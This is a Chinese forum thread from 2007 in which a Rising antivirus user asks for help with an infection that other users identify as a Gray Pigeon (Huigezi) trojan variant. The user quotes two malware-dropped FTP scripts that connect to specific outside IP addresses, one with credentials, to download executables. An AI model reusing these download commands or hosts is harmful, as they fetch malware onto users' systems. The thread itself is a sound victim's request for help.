12   1  /  2  页   跳转

顽强的小毒(瑞星正版用户)

顽强的小毒(瑞星正版用户)

以前的苦恼就不说了
N次折腾后,重做了新系统
昨天晚上打好补丁,OK
但刚刚突然,防火墙提示 自动认证了ftp.exe (大概是这个意思)
系统 CPU 100%
查了会后发现C:\WINDOWS\system32 多了点东西
打开 多出的 nov.sys  居然是

open 125.65.111.79
new
123
get 804860942.exe cyu.exe
bye
 
找到了 cyu.exe 但没找到804860942.exe
传上了,有高手帮我诊断诊断

-----ps 事发后我把 ftp.exe cmd.exe禁止掉了,不知道有用没

[用户系统信息]Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)

附件附件:

下载次数:127
文件类型:application/octet-stream
文件大小:
上传时间:2007-11-29 18:43:06
描述:

最后编辑2007-12-16 11:38:04
分享到:
gototop
 

有高手吗?
gototop
 

今天又有了新东西
同样在 C:\WINDOWS\system32 下
多出了 cc1.txt
 内容如下

open 59.52.29.229
admin
syw
binary
get g.exe
bye

在C盘根目录下多了个 8.exe
打包传上

附件附件:

下载次数:221
文件类型:application/octet-stream
文件大小:
上传时间:2007-11-30 9:03:59
描述:

gototop
 

用瑞星08版试试,下载后升级到最新版本,在正常上模式下查杀,不行就在安全模式下查杀,或同时还可以用windows清理及windows优化大师,都试试看
gototop
 

已经是最新的08版杀毒+防火墙
安全模式正常模式全试了
gototop
 

使用windows清理 发现是
G-server
灰鸽子木马及其变种

但其没杀掉
正在考虑如何彻底清理中...

感谢 农村阿哥
gototop
 

换杀软吧瑞星不行连灰鸽子都搞不定。。。不过其主动防御还是有点效果
gototop
 

扫SRENG日志。
gototop
 

瑞星真的那么差呀上,要 是这样的话我看我还是用别的杀毒软件算了,听说卡巴很强呀上,不知性能怎样。
gototop
 

LSD..卡巴也不杂的..

都用过了嘛..

有些病毒还是要靠手动的...
gototop
 
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT